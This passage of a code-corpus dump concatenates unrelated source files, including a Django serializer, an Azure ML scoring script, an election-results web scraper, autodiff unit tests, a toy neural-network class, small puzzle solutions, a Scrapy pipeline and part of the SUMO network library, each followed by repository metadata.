max_length=15, validators=[ validators.RegexValidator( regex=r"^[eEvVjJ]\d+$", message=_("your document id is not well formatted"), ), ], ) class ForeignTransactionSerializer(serializers.ModelSerializer): acc_src = TransactionAccountSerializer(required=False) acc_dst = TransactionAccountSerializer(required=False) card_src = TransactionCardSerializer(required=False) card_dst = TransactionCardSerializer(required=False) class Meta: model = Transaction fields = [ "id", "acc_src", "acc_dst", "card_src", "card_dst", "amount", "type", "status", "reason", "date", ] read_only_fields = ("type", "status", "date", "id") def create(self, validated_data): field_names = [field.name for field in self.Meta.model._meta.get_fields()] data = {a: b for a, b in validated_data.items() if a in field_names} kwargs = { "amount": data["amount"], "reason": data["reason"], "source": validated_data.get("acc_src") or validated_data.get("card_src"), "target": validated_data.get("acc_dst") or validated_data.get("card_dst") } return self.Meta.model.objects.create_any_transaction(from_foreign=True, **kwargs)
Vixx-X/DEGVABank-backend
degvabank/degvabank/apps/transaction/serializers.py
serializers.py
py
5,507
python
en
code
0
github-code
6
35721608965
import os import json import numpy as np import preprocessing as preprocessing from tensorflow import keras def init(): global model global vocab global max_len model = keras.models.load_model(os.path.join(os.getenv('AZUREML_MODEL_DIR'), 'model'), compile=False) with open(os.path.join(os.getenv('AZUREML_MODEL_DIR'), 'model', 'vocab.json')) as json_file: vocab = json.load(json_file) with open(os.path.join(os.getenv('AZUREML_MODEL_DIR'), 'model', 'params.json')) as json_file: params = json.load(json_file) max_len = params['max_len'] def run(raw_data): tweets = np.array(json.loads(raw_data)["data"]) processed_tweets = preprocessing.process_tweets(tweets, vocab, max_len) result = model.predict(processed_tweets).ravel() return result.tolist()
luisespriella9/disastersLocator
src/scoring.py
scoring.py
py
809
python
en
code
0
github-code
6
29520352035
import requests from bs4 import BeautifulSoup as bs import csv from itertools import chain def get_urls(): """ Skilar lista sem inniheldur slóðir á allar undirsíður með kosningaúrslitum """ main_page = requests.get("http://www.kosningastofnun.in/") page_soup = bs(main_page.content, "html.parser") urls = [title.a.get("href") for title in page_soup.find_all(class_="blog-post-title")] return urls def scrape(urls): """ Tekur inn lista af slóðum og skrapar fyrstu töfluna sem finnst á hverri slóð. Skilar lista af dicts þar sem hvert dict er með töfluhausa sem lykla og töfluhólf sem gildi """ all_dicts = [] for url in urls: elections_page = requests.get(url) elections_soup = bs(elections_page.content, "html.parser") # Finnum alla töfluhausa og setjum í lista: headers = [header.string.strip() for header in elections_soup.find_all("th")] # Förum svo í gegnum hverja röð og setjum gildin í lista: for row in elections_soup.find_all("tr"): results = [cell.string.strip() for cell in row.find_all("td")] # Athugum hvort þetta er gild niðurstöðulína, annars gerum við ekkert: if results: # Nú getum við sett þessar niðurstöður í dict með hausunum: elections = dict(zip(headers, results)) # Ef dagsetning var ekki með í þessum niðurstöðum þurfum við # að skrapa hana úr titlinum og setja inn í dictið: if "Dagsetning" not in elections: full_title = elections_soup.h2.a.string # Splittum titlinum á fyrsta bili og tökum seinni hlutann: elections["Dagsetning"] = full_title.split(" ", 1)[1] # Og setjum svo dictið í stóra listann: all_dicts.append(elections) return all_dicts def save_csv(list_of_dicts): """ Tekur inn lista af dicts og skrifar út í CSV-skrána "kosningar.csv" í möppunni sem skriftan er keyrð úr """ with open("kosningar.csv", "w") as csv_file: fieldnames = set([key for key in chain(*list_of_dicts)]) # Röðum dálkaheitunum, fyrst í stafrófsröð og svo aftur til að fá # dagsetningu fremst (ekki nauðsynlegt): fieldnames = sorted(fieldnames) fieldnames = sorted(fieldnames, key=lambda x: x == "Dagsetning", reverse=True) writer = csv.DictWriter(csv_file, fieldnames) writer.writeheader() writer.writerows(list_of_dicts) # Keyrum heila klabbið: if __name__ == "__main__": save_csv(scrape(get_urls()))
flother/data-acq-viz
2018/kosningaskrapari-lausn.py
kosningaskrapari-lausn.py
py
2,713
python
is
code
1
github-code
6
72588123388
from numpy.testing import * import numpy import numpy.random from adolc import * from adolc.cgraph import * from adolc.tangent import * class TangentOperationsTests(TestCase): def test_constructor(self): t1 = Tangent(1,2) t2 = Tangent(adouble(1),2) def test_float_tangent_float_tangent(self): tx = Tangent(2.,3.) ty = Tangent(5.,7.) tz = tx + ty assert_array_almost_equal([tz.x,tz.xdot], [2+5, 3+7]) tz = tx - ty assert_array_almost_equal([tz.x,tz.xdot], [2-5, 3-7]) tz = tx * ty assert_array_almost_equal([tz.x,tz.xdot], [2*5, 3*5 + 2*7]) tz = tx / ty assert_array_almost_equal([tz.x,tz.xdot], [2./5., (3*5 - 2*7.)/5**2]) def test_double_tangent_adouble(self): tx = Tangent(2,3) ay = adouble(5) tz = tx + ay assert_array_almost_equal([tz.x.val,tz.xdot], [2+5, 3]) tz = tx * ay assert_array_almost_equal([tz.x.val,tz.xdot.val], [2*5, 3*5]) def test_adouble_tangent_adouble_addition(self): tx = Tangent(adouble(2), 1) ty = Tangent(adouble(3), 0) tz = tx + ty assert_array_almost_equal([tz.x.val,tz.xdot], [5, 1]) class SemiImplicitOdeLhsTest(TestCase): """ This is a test example taken from PYSOLVIND In chemical engineering, semi-implicit ODEs of the type:: d/dt g(t,y(t)) = f(t,y(t)) y(0) = y_0 have to be solved. PYSOLVIND requires a function afcn that computes:: d/dy g(t,y) d/dt y where d/dt y = xdd y = xd """ def test_differentiation_of_gfcn(self): def gfcn(a): print('called gfcn') ty = [Tangent(a.xd[0], a.xdd[0]),Tangent(a.xd[1], a.xdd[1]), Tangent(a.xd[2], a.xdd[2])] tlhs = [ty[0] * ty[2], ty[1] * ty[2], ty[2]] a.lhs[0] = tlhs[0].xdot a.lhs[1] = tlhs[1].xdot a.lhs[2] = tlhs[2].xdot def afcn(a): a.lhs[0] = a.xd[2] * a.xdd[0] + a.xd[0] * a.xdd[2] a.lhs[1] = a.xd[2] * a.xdd[1] + a.xd[1] * a.xdd[2] a.lhs[2] = a.xdd[2] class Args: def __init__(self): self.xd = numpy.random.rand(3) self.xdd = numpy.random.rand(3) self.lhs = numpy.zeros(3) args = Args() gfcn(args) result1 = args.lhs.copy() afcn(args) result2 = args.lhs.copy() assert_array_almost_equal(result1, result2) # class FunctionExampleTests(TestCase): # def test_utps_on_jacobian(self): # def f(x,p): # print p # print p[0] + p[1] # return (p[0] + p[1]) * x**2 # AP = AdolcProgram() # AP.trace_on(1) # ax = adouble(3.) # ap = adouble([5.,7.]) # AP.independent(ax) # AP.independent(ap) # tp = [Tangent(ap[0],1),Tangent(ap[1],0)] # tf = f(ax,tp) # aJ = tf.xdot # print aJ # AP.dependent(aJ) # AP.trace_off() # g = gradient(1, [1,2,3]) # print g if __name__ == '__main__': try: import nose except: print('Please install nose for unit testing') nose.runmodule()
b45ch1/pyadolc
adolc/tests/test_tangent.py
test_tangent.py
py
3,503
python
en
code
43
github-code
6
29875084962
## ~~~~~~~~~~~~~~~~~~ # Deep Willy Network ## ~~~~~~~~~~~~~~~~~~ import numpy as np, json, sys, os sys.path.append(os.path.dirname(__file__)) from willies import * class DeepWilly(object): _willy_classes = {'connected': ConnectedWilly, 'dropout': DropoutWilly, 'convolutional': ConvolutionalWilly, 'pooling': PoolingWilly, 'stacking': StackingWilly} def __init__(self, cost_func = 'cross entropy'): self.willies = [] self.n_willies = 0 self.cost_func = cost_func if cost_func == 'cross entropy': self.cost = lambda a, y: -np.mean(y * np.log(a + (a == 0)) + (1-y) * np.log(1-a + (a == 1))) self.dcost = lambda a, y: (1/a.shape[0]) * (a - y) / (a * (1 - a) + 1e-99) elif cost_func == 'quadratic': self.cost = lambda a, y: 0.5 * np.mean((a - y)**2) self.dcost = lambda a, y: (1/a.shape[0]) * (a - y) else: raise Exception('Unsupported cost function: ' + cost_func) def add(self, willy): ''' Add a willy to the network and set it up based on the previous willy's output (if not the first one). ''' if len(self.willies) == 0: if not willy.is_set_up: raise Exception('Input shape or number must be provided to first Willy.') else: willy.set_up(self.willies[-1].out_shape) self.willies.append(willy) self.n_willies += 1 def forward_prop(self, X): ''' Forward propagates X through the willies. ''' for willy in self.willies: X = willy.forward_prop(X) return X def backward_prop(self, X, y, learn_rate, mom_rate, reg_rate): ''' Backward propagates errors while simultaneously updating weights in each layer. ''' # Output layer dC/da batch_size = X.shape[0] dA = self.dcost(self.willies[-1].A, y) # Backpropagate, updating weights XA = [X] + [willy.A for willy in self.willies[:-1]] XA = XA[::-1] for w, willy in enumerate(reversed(self.willies)): willy.update_weights(dA, XA[w], learn_rate, mom_rate, reg_rate) dA = willy.backward_prop() @staticmethod def get_batches(X, y, batch_size): ''' Shuffles training data and gets random batch of desired size. ''' if batch_size == -1 or batch_size >= X.shape[0]: return [X], [y] # Shuffle data shuffled_indices = np.random.permutation(len(X)) shuffled_X = X[shuffled_indices] shuffled_y = y[shuffled_indices] # Get batch of desired size X_batches = [] y_batches = [] for i in range(X.shape[0]//batch_size): X_batches.append(shuffled_X[int(batch_size*i):int(batch_size*(i+1))]) y_batches.append(shuffled_y[int(batch_size*i):int(batch_size*(i+1))]) return X_batches, y_batches def train(self, X, y, num_iterations, batch_size, learn_rate, reg_rate, mom_rate = 0, verbose = False): ''' Builds network, trains using given data and training parameters. ''' # Change dtypes X = X.astype(np.float32) y = y.astype(np.float32) # Initialise momenta to 0 for willy in self.willies: willy.reset_momenta() # Train network for iteration in range(num_iterations): # Get batches: X_batches, y_batches = self.get_batches(X, y, batch_size) for batchX, batchy in zip(X_batches, y_batches): # Forward propagate self.forward_prop(batchX) # Backward propagate & update weights self.backward_prop(batchX, batchy, learn_rate, mom_rate, reg_rate) # Print progress if verbose: if iteration % verbose == 0: print("Training cost on last batch: ", self.cost(self.willies[-1].A, batchy)) def predict(self, X, pred_type = 'as is'): self.yhat = self.forward_prop(X) if pred_type == 'binary': self.yhat = 1 * (self.yhat > 0.5) elif pred_type == 'argmax': self.yhat = np.argmax(self.yhat, axis = 1).reshape(-1, 1) else: assert pred_type == 'as is', \ "Provided argument pred_type (" + pred_type + ") not supported." return self.yhat def accuracy(self, X, y, pred_type = 'as is'): ''' Gets accuracy of predictions. ''' return np.mean(self.predict(X, pred_type) == y) def save(self, filename): ''' Saves deep willy to file \filename. ''' willy_data = [] for willy in self.willies: willy_data.append(willy.save()) data = {'cost': self.cost_func, 'willies': willy_data} file = open(filename, "w") json.dump(data, file) file.close() @classmethod def load(cls, filename): ''' Loads deep willy from file \filename. ''' file = open(filename, "r") data = json.load(file) file.close() deep_willy = cls(data['cost_func']) for willy in data['willies']: willy_class = DeepWilly._willy_classes[willy['willy']] deep_willy.add(willy_class.load(willy)) return deep_willy def copy(self): ''' Replicates this deep willy using its attributes. ''' copy = DeepWilly(cost_func = self.cost_func) for willy in self.willies: copy.willies.append(willy.copy()) copy.n_willies += 1 return copy
gavarela/willyai
willyai/deepWilly.py
deepWilly.py
py
6,171
python
en
code
0
github-code
6
50051591
from typing import * # 一个较长的字符串肯定不会是一个较短字符串的子序列,那么只需要从长到短判断,每一个字符串是否为其他长度不小于它的字符串的子序列就行了 # When we add a letter Y to our candidate longest uncommon subsequence answer of X, it only makes it strictly harder to find a common subsequence. # Thus our candidate longest uncommon subsequences will be chosen from the group of words itself. class Solution: def findLUSlength(self, strs: List[str]) -> int: def isSubSeq(w1, w2): if len(w1) > len(w2): return False l, r = 0, 0 while l < len(w1) and r < len(w2): if w1[l] == w2[r]: l += 1 r += 1 return l == len(w1) strs.sort(key = len, reverse = True) for i, w1 in enumerate(strs): if all(not isSubSeq(w1, w2) for j, w2 in enumerate(strs) if i != j): return len(w1) return -1 if __name__ == "__main__": s = Solution() assert s.findLUSlength(["aba","cdc","eae"]) == 3 assert s.findLUSlength(["aaa","aaa","aa"]) == -1
code-cp/leetcode
solutions/522/main.py
main.py
py
1,198
python
en
code
0
github-code
6
44632376656
# coding:utf-8 from bs4 import BeautifulSoup import urllib.request as req import sqlite3 from contextlib import closing url="http://su-gi-rx.com/2017/07/16/python_4/" dbname='database.db' conn=sqlite3.connect(dbname) c=conn.cursor() table_name = 'test' def get_html(): #urlopen()でデータ取得 res=req.urlopen(url) #BeautifulSoup()で解析 soup=BeautifulSoup(res,'html.parser') #任意のデータを抽出 title1=soup.find("h1").string #print("title=",title1) p_list=soup.find_all("p") #print("text=",p_list) return [(str(title1),str(p_list))] def create_table(tname): #executeメソッドでSOL文を実行する create_table='''create table if NOT EXISTS {0} (title varchar(64),p_list varchar(32))'''.format(tname) c.execute(create_table) def insert_data(tname,data): insert_sql='insert into {0} (title,p_list) values(?,?)'.format(tname) c.executemany(insert_sql,test) conn.commit() if __name__=='__main__': create_table(table_name) test=get_html() insert_data(table_name,test) select_sql = 'select * from {0}'.format(table_name) for row in c.execute(select_sql): print(row) conn.close()
riku-nagisa/python1
html_ren.py
html_ren.py
py
1,261
python
en
code
0
github-code
6
34183765672
def convert_rank(num): rank = 6 - num + 1 if rank >= 6 : rank = 6 return rank def solution(lottos, win_nums): match, zero = 0, 0 for num in lottos : if not num : zero += 1 if num in win_nums: match += 1 return [convert_rank(match+zero), convert_rank(match)] test_case = [ [[44, 1, 0, 0, 31, 25], [31, 10, 45, 1, 6, 19]], [[0, 0, 0, 0, 0, 0], [38, 19, 20, 40, 15, 25]], [[45, 4, 35, 20, 3, 9], [20, 9, 3, 45, 4, 35]] ] for lottos, win_nums in test_case: print(solution(lottos, win_nums))
study-for-interview/algorithm-study
hanjo/개인용/programmers/완전탐색/L1_로또의최고순위와최저순위/solution.py
solution.py
py
578
python
en
code
8
github-code
6
25018521367
model_cfg = { "high_level_parameters": { # parameters common to all models, e.g. how much data to get, debugging parameters etc. "data_period": ("2020-01-01", "2023-01-01"), "parameter2": 60, "parameter3": 20, }, "low_level_parameters": { "model1_parameters": { "learning_rate": 1, "hidden_layers": 2, }, "model2_parameters": { "ewma_alpha": 0.05, "sigma": 3, }, }, }
hviidhenrik/my-sample-data-science-structure
core/config/model_config.py
model_config.py
py
488
python
en
code
0
github-code
6
73995685309
# from game import random # from game import np from game import Game from agent import Agent import pandas as pd class GameAnalysis: def __init__(self, imported_game: Game): self.game = imported_game def print_data(self): rows = [] for rob in self.game.robots: rows.append([rob.name, rob.logs["food_found"]]) robdf = pd.DataFrame(rows, columns=["name", "food found"]).set_index(["name"]) return robdf @staticmethod def vocab_to_df(rob: Agent): rows = [] columns = [f"{rob.name}_input", f"{rob.name}_action", f"{rob.name}_features", f"{rob.name}_inertia", f"{rob.name}_mistakes"] for word, action_dict in rob.vocab.items(): for action, action_data in action_dict.items(): row = [str(word), str(action), str(action_data[0]), action_data[1][0], action_data[1][1]] rows.append(row) return pd.DataFrame(rows, columns=columns).set_index([f"{rob.name}_input"]) def print_vocabs(self): for rob in self.game.robots: df = self.vocab_to_df(rob) if "merged_df" not in locals(): merged_df = df else: merged_df = merged_df.join(df, how="outer") return merged_df def print_vocab_chain(self, requester: Agent, fetcher: Agent): dfr = self.vocab_to_df(requester).reset_index() dff = self.vocab_to_df(fetcher).reset_index() return pd.merge(dfr, dff, left_on="A_action", right_on="B_input", how="outer") # def plot_robot_paths(self, l_slice=None, r_slice=None, reverse=True): # fig, ax = plt.subplots() # empty_plot = True # for rob in self.game.robots: # col = (np.random.random(), np.random.random(), np.random.random()) # if l_slice and r_slice: # paths_to_plot = rob.logs["taken_paths"][l_slice:r_slice] # elif l_slice or r_slice: # paths_to_plot = rob.logs["taken_paths"][l_slice:] # else: # paths_to_plot = rob.logs["taken_paths"] # if reverse: # paths_to_plot.reverse() # for path in paths_to_plot: # final_location = path[-1] # unzipped = self.unzip_locations(path) # x = unzipped[0] # y = unzipped[1] # # if self.test_for_movement(x, y): # # empty_plot = False # # touching_food = False # # for food_type in self.game.food_types: # # if self.game.maze.is_player_colliding_with_food(final_location,food_type): # # touching_food = True # # print(touching_food) # ax.plot(x, y, c=col) # if not empty_plot: # for food_type in self.game.food_types: # ax.plot(*food_type[1], 'o') # ax.plot(*food_type[1], 'o', markersize=int(self.game.close_enough * 12)) # plt.xlim([-self.game.arena_size, self.game.arena_size]) # plt.ylim([-self.game.arena_size, self.game.arena_size]) # plt.show() # else: # plt.close() # @staticmethod # def test_for_movement(x, y): # if math.isclose(np.average(x), x[0]) and math.isclose(np.average(y), y[0]): # return False # return True def show_instructions(self): for rob in self.game.robots: if rob.role == "fetcher": df = pd.DataFrame(rob.logs["given_sentences"]) return df # @staticmethod # def unzip_locations(entries): # x = [] # y = [] # for entry in entries: # x.append(entry[0]) # y.append(entry[1]) # return x, y
Jayordo/thymio_aseba_install
lang_game_2/game_analysis.py
game_analysis.py
py
3,884
python
en
code
0
github-code
6
6771398570
# -*- coding: utf-8 -*- # Define your item pipelines here # # Don't forget to add your pipeline to the ITEM_PIPELINES setting # See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html import pymysql class ProxyPoolCrawlerPipeline(object): def process_item(self, item, spider): return item # 存储到mysql数据库 class ProxyPoolCrawler2mysql(object): # # 测试ip是否有效,有效再插入数据库 # def test_alive(proxy): # http_url = "http://www.baidu.com" # proxy_url = "http://{0}".format(proxy) # try: # proxy_dict = { # "http": proxy_url, # } # response = requests.get(http_url, proxies=proxy_dict, timeout=5) # except Exception as e: # # print("invalid ip and port") # return False # else: # code = response.status_code # if code >= 200 and code < 300: # # print("effective ip") # return True # else: # # print("invalid ip and port") # return False def process_item(self, item, spider): address = item['address'] connection = pymysql.connect( host='localhost', # 连接的是本地数据库 user='root', # 自己的mysql用户名 passwd='', # 自己的密码 db='proxypool', # 数据库的名字 charset='utf8mb4', # 默认的编码方式: cursorclass=pymysql.cursors.DictCursor) try: with connection.cursor() as cursor: # 创建更新值的sql语句 sql = """INSERT INTO proxy(address) VALUES (%s)""" # 执行sql语句 # excute 的第二个参数可以将sql缺省语句补全,一般以元组的格式 cursor.execute( sql, (address)) # 提交本次插入的记录 connection.commit() finally: # 关闭连接 connection.close() return item
ShawnRong/proxy-pool-crawler
proxy_pool_crawler/pipelines.py
pipelines.py
py
2,136
python
en
code
0
github-code
6
2721248561
import copy, random, datetime suppliesDataSets = [ [ { "labels": [], #food "data": [] }, { "labels": [], #drink "data": [] }, { "labels": [], #medicine "data": [] } ] ] now = datetime.datetime.now() for i in range(3): for j in range(42): t_ = (now + datetime.timedelta(days=-j)).strftime('%Y-%m-%d') suppliesDataSets[0][i]["labels"].append(t_) k = random.randint(0, 200) suppliesDataSets[0][i]["data"].append(k) for i in range(8): cloned_ = copy.deepcopy(suppliesDataSets[0]) suppliesDataSets.append(cloned_)
e1833-tomohiro/Kadai
backend/store.py
store.py
py
680
python
en
code
0
github-code
6
8384623961
from __future__ import print_function from __future__ import absolute_import import sys import math import heapq import gzip import warnings from xml.sax import handler, parse from copy import copy from collections import defaultdict from itertools import chain import sumolib from . import lane, edge, netshiftadaptor, node, connection, roundabout # noqa from .connection import Connection class TLS: """Traffic Light Signal for a sumo network""" def __init__(self, id): self._id = id self._connections = [] self._maxConnectionNo = -1 self._programs = {} def addConnection(self, inLane, outLane, linkNo): self._connections.append([inLane, outLane, linkNo]) if linkNo > self._maxConnectionNo: self._maxConnectionNo = linkNo def getConnections(self): return self._connections def getID(self): return self._id def getLinks(self): links = {} for the_connection in self._connections: if the_connection[2] not in links: links[the_connection[2]] = [] links[the_connection[2]].append(the_connection) return links def getEdges(self): edges = set() for c in self._connections: edges.add(c[0].getEdge()) return edges def addProgram(self, program): self._programs[program._id] = program def removePrograms(self): self._programs.clear() def toXML(self): ret = "" for p in self._programs: ret = ret + self._programs[p].toXML(self._id) return ret def getPrograms(self): return self._programs class Phase: def __init__(self, duration, state, minDur=-1, maxDur=-1, next=None, name=""): self.duration = duration self.state = state self.minDur = minDur # minimum duration (only for actuated tls) self.maxDur = maxDur # maximum duration (only for actuated tls) self.next = [] if next is None else next self.name = name def __repr__(self): name = "" if self.name == "" else ", name='%s'" % self.name next = "" if len(self.next) == 0 else ", next='%s'" % self.next return ("Phase(duration=%s, state='%s', minDur=%s, maxDur=%s%s%s" % (self.duration, self.state, self.minDur, self.maxDur, name, next)) class TLSProgram: def __init__(self, id, offset, type): self._id = id self._type = type self._offset = offset self._phases = [] self._params = {} def addPhase(self, state, duration, minDur=-1, maxDur=-1, next=None, name=""): self._phases.append(Phase(duration, state, minDur, maxDur, next, name)) def toXML(self, tlsID): ret = ' <tlLogic id="%s" type="%s" programID="%s" offset="%s">\n' % ( tlsID, self._type, self._id, self._offset) for p in self._phases: minDur = '' if p.minDur < 0 else ' minDur="%s"' % p.minDur maxDur = '' if p.maxDur < 0 else ' maxDur="%s"' % p.maxDur name = '' if p.name == '' else ' name="%s"' % p.name next = '' if len(p.next) == 0 else ' next="%s"' % ' '.join(map(str, p.next)) ret += ' <phase duration="%s" state="%s"%s%s%s%s/>\n' % ( p.duration, p.state, minDur, maxDur, name, next) for k, v in self._params.items(): ret += ' <param key="%s" value="%s"/>\n' % (k, v) ret += ' </tlLogic>\n' return ret def getPhases(self): return self._phases def getType(self): return self._type def setParam(self, key, value): self._params[key] = value def getParam(self, key, default=None): return self._params.get(key, default) def getParams(self): return self._params class Net: """The whole sumo network.""" def __init__(self): self._location = {} self._id2node = {} self._id2edge = {} self._crossings_and_walkingAreas = set() self._macroConnectors = set() self._id2tls = {} self._nodes = [] self._edges = [] self._tlss = [] self._ranges = [[10000, -10000], [10000, -10000]] self._roundabouts = [] self._rtreeEdges = None self._rtreeLanes = None self._allLanes = [] self._origIdx = None self._proj = None self.hasInternal = False # store dijsktra heap for reuse if the same origin is used repeatedly self._shortestPathCache = None def setLocation(self, netOffset, convBoundary, origBoundary, projParameter): self._location["netOffset"] = netOffset self._location["convBoundary"] = convBoundary self._location["origBoundary"] = origBoundary self._location["projParameter"] = projParameter def addNode(self, id, type=None, coord=None, incLanes=None, intLanes=None): if id is None: return None if id not in self._id2node: n = node.Node(id, type, coord, incLanes, intLanes) self._nodes.append(n) self._id2node[id] = n self.setAdditionalNodeInfo( self._id2node[id], type, coord, incLanes, intLanes) return self._id2node[id] def setAdditionalNodeInfo(self, node, type, coord, incLanes, intLanes=None): if coord is not None and node._coord is None: node._coord = coord self._ranges[0][0] = min(self._ranges[0][0], coord[0]) self._ranges[0][1] = max(self._ranges[0][1], coord[0]) self._ranges[1][0] = min(self._ranges[1][0], coord[1]) self._ranges[1][1] = max(self._ranges[1][1], coord[1]) if incLanes is not None and node._incLanes is None: node._incLanes = incLanes if intLanes is not None and node._intLanes is None: node._intLanes = intLanes if type is not None and node._type is None: node._type = type def addEdge(self, id, fromID, toID, prio, function, name, edgeType=''): if id not in self._id2edge: fromN = self.addNode(fromID) toN = self.addNode(toID) e = edge.Edge(id, fromN, toN, prio, function, name, edgeType) self._edges.append(e) self._id2edge[id] = e if function: self.hasInternal = True return self._id2edge[id] def addLane(self, edge, speed, length, width, allow=None, disallow=None): return lane.Lane(edge, speed, length, width, allow, disallow) def addRoundabout(self, nodes, edges=None): r = roundabout.Roundabout(nodes, edges) self._roundabouts.append(r) return r def addConnection(self, fromEdge, toEdge, fromlane, tolane, direction, tls, tllink, state, viaLaneID=None): conn = connection.Connection( fromEdge, toEdge, fromlane, tolane, direction, tls, tllink, state, viaLaneID) fromEdge.addOutgoing(conn) fromlane.addOutgoing(conn) toEdge._addIncoming(conn) if viaLaneID: try: # internal lanes are only available when building with option withInternal=True viaLane = self.getLane(viaLaneID) viaEdge = viaLane.getEdge() viaEdge._addIncoming(connection.Connection( fromEdge, viaEdge, fromlane, viaLane, direction, tls, tllink, state, '')) except Exception: pass return conn def getEdges(self, withInternal=True): if not withInternal: return [e for e in self._edges if e.getFunction() == ''] else: return self._edges def getRoundabouts(self): return self._roundabouts def hasEdge(self, id): return id in self._id2edge def getEdge(self, id): return self._id2edge[id] def getLane(self, laneID): edge_id, lane_index = laneID.rsplit("_", 1) return self.getEdge(edge_id).getLane(int(lane_index)) def _initRTree(self, shapeList, includeJunctions=True): import rtree # noqa result = rtree.index.Index() result.interleaved = True for ri, shape in enumerate(shapeList): result.add(ri, shape.getBoundingBox(includeJunctions)) return result # Please be aware that the resulting list of edges is NOT sorted def getNeighboringEdges(self, x, y, r=0.1, includeJunctions=True, allowFallback=True): edges = [] try: if self._rtreeEdges is None: self._rtreeEdges = self._initRTree(self._edges, includeJunctions) for i in self._rtreeEdges.intersection((x - r, y - r, x + r, y + r)): e = self._edges[i] d = sumolib.geomhelper.distancePointToPolygon( (x, y), e.getShape(includeJunctions)) if d < r: edges.append((e, d)) except ImportError: if not allowFallback: raise warnings.warn("Module 'rtree' not available. Using brute-force fallback.") for the_edge in self._edges: d = sumolib.geomhelper.distancePointToPolygon((x, y), the_edge.getShape(includeJunctions)) if d < r: edges.append((the_edge, d)) return edges def getNeighboringLanes(self, x, y, r=0.1, includeJunctions=True, allowFallback=True): lanes = [] try: if self._rtreeLanes is None: for the_edge in self._edges: self._allLanes += the_edge.getLanes() self._rtreeLanes = self._initRTree(self._allLanes, includeJunctions) for i in self._rtreeLanes.intersection((x - r, y - r, x + r, y + r)): the_lane = self._allLanes[i] d = sumolib.geomhelper.distancePointToPolygon((x, y), the_lane.getShape(includeJunctions)) if d < r: lanes.append((the_lane, d)) except ImportError: if not allowFallback: raise warnings.warn("Module 'rtree' not available. Using brute-force fallback.") for the_edge in self._edges: for the_lane in the_edge.getLanes(): d = sumolib.geomhelper.distancePointToPolygon((x, y), the_lane.getShape(includeJunctions)) if d < r: lanes.append((the_lane, d)) return lanes def hasNode(self, id): return id in self._id2node def getNode(self, id): return self._id2node[id] def getNodes(self): return self._nodes def getTLS(self, tlid): return self._id2tls[tlid] def getTLSSecure(self, tlid): if tlid in self._id2tls: tls = self._id2tls[tlid] else: tls = TLS(tlid) self._id2tls[tlid] = tls self._tlss.append(tls) return tls def getTrafficLights(self): return self._tlss def addTLS(self, tlid, inLane, outLane, linkNo): tls = self.getTLSSecure(tlid) tls.addConnection(inLane, outLane, linkNo) return tls def addTLSProgram(self, tlid, programID, offset, type, removeOthers): tls = self.getTLSSecure(tlid) program = TLSProgram(programID, offset, type) if removeOthers: tls.removePrograms() tls.addProgram(program) return program def setFoes(self, junctionID, index, foes, prohibits): self._id2node[junctionID].setFoes(index, foes, prohibits) def forbids(self, possProhibitor, possProhibited): return possProhibitor.getFrom().getToNode().forbids(possProhibitor, possProhibited) def getDownstreamEdges(self, edge, distance, stopOnTLS, stopOnTurnaround): """return a list of lists of the form [[firstEdge, pos, [edge_0, edge_1, ..., edge_k], aborted], ...] where firstEdge: is the downstream edge furthest away from the intersection, [edge_0, ..., edge_k]: is the list of edges from the intersection downstream to firstEdge pos: is the position on firstEdge with distance to the end of the input edge aborted: a flag indicating whether the downstream search stopped at a TLS or a node without incoming edges before reaching the distance threshold """ ret = [] seen = set() toProc = [] toProc.append([edge, 0, []]) while not len(toProc) == 0: ie = toProc.pop() if ie[0] in seen: continue seen.add(ie[0]) if ie[1] + ie[0].getLength() >= distance: ret.append( [ie[0], ie[0].getLength() + ie[1] - distance, ie[2], False]) continue if len(ie[0]._incoming) == 0: ret.append([ie[0], ie[0].getLength() + ie[1], ie[2], True]) continue mn = [] stop = False for ci in ie[0]._incoming: if ci not in seen: prev = copy(ie[2]) if stopOnTLS and ci._tls and ci != edge and not stop: ret.append([ie[0], ie[1], prev, True]) stop = True elif (stopOnTurnaround and ie[0]._incoming[ci][0].getDirection() == Connection.LINKDIR_TURN and not stop): ret.append([ie[0], ie[1], prev, True]) stop = True else: prev.append(ie[0]) mn.append([ci, ie[0].getLength() + ie[1], prev]) if not stop: toProc.extend(mn) return ret def getEdgesByOrigID(self, origID): if self._origIdx is None: self._origIdx = defaultdict(set) for the_edge in self._edges: for the_lane in the_edge.getLanes(): for oID in the_lane.getParam("origId", "").split(): self._origIdx[oID].add(the_edge) return self._origIdx[origID] def getBBoxXY(self): """ Get the bounding box (bottom left and top right coordinates) for a net; Coordinates are in X and Y (not Lat and Lon) :return [(bottom_left_X, bottom_left_Y), (top_right_X, top_right_Y)] """ return [(self._ranges[0][0], self._ranges[1][0]), (self._ranges[0][1], self._ranges[1][1])] # the diagonal of the bounding box of all nodes def getBBoxDiameter(self): return math.sqrt( (self._ranges[0][0] - self._ranges[0][1]) ** 2 + (self._ranges[1][0] - self._ranges[1][1]) ** 2) def getGeoProj(self): if self._proj is None: import pyproj try: self._proj = pyproj.Proj(projparams=self._location["projParameter"]) except RuntimeError: if hasattr(pyproj.datadir, 'set_data_dir'): pyproj.datadir.set_data_dir('/usr/share/proj') self._proj = pyproj.Proj(projparams=self._location["projParameter"]) raise return self._proj def getLocationOffset(self): """ offset to be added after converting from geo-coordinates to UTM""" return list(map(float, self._location["netOffset"].split(","))) def getBoundary(self): """ return xmin,ymin,xmax,ymax network coordinates""" return list(map(float, self._location["convBoundary"].split(","))) def convertLonLat2XY(self, lon, lat, rawUTM=False): x, y = self.getGeoProj()(lon, lat) if rawUTM: return x, y else: x_off, y_off = self.getLocationOffset() return x + x_off, y + y_off def convertXY2LonLat(self, x, y, rawUTM=False): if not rawUTM: x_off, y_off = self.getLocationOffset() x -= x_off y -= y_off return self.getGeoProj()(x, y, inverse=True) def move(self, dx, dy, dz=0): for n in self._nodes: n._coord = (n._coord[0] + dx, n._coord[1] + dy, n._coord[2] + dz) for e in self._edges: for l in e._lanes: l._shape = [(p[0] + dx, p[1] + dy, p[2] + dz) for p in l.getShape3D()] e.rebuildShape() def getInternalPath(self, conn, fastest=False): minInternalCost = 1e400 minPath = None for c in conn: if c.getViaLaneID() != "": viaCost = 0 viaID = c.getViaLaneID() viaPath = [] while viaID != "": viaLane = self.getLane(viaID) viaCost += viaLane.getLength() if not fastest else viaLane.getLength() / viaLane.getSpeed() viaID = viaLane.getOutgoing()[0].getViaLaneID() viaPath.append(viaLane.getEdge()) if viaCost < minInternalCost: minInternalCost = viaCost minPath = viaPath return minPath, minInternalCost def getOptimalPath(self, fromEdge, toEdge, fastest=False, 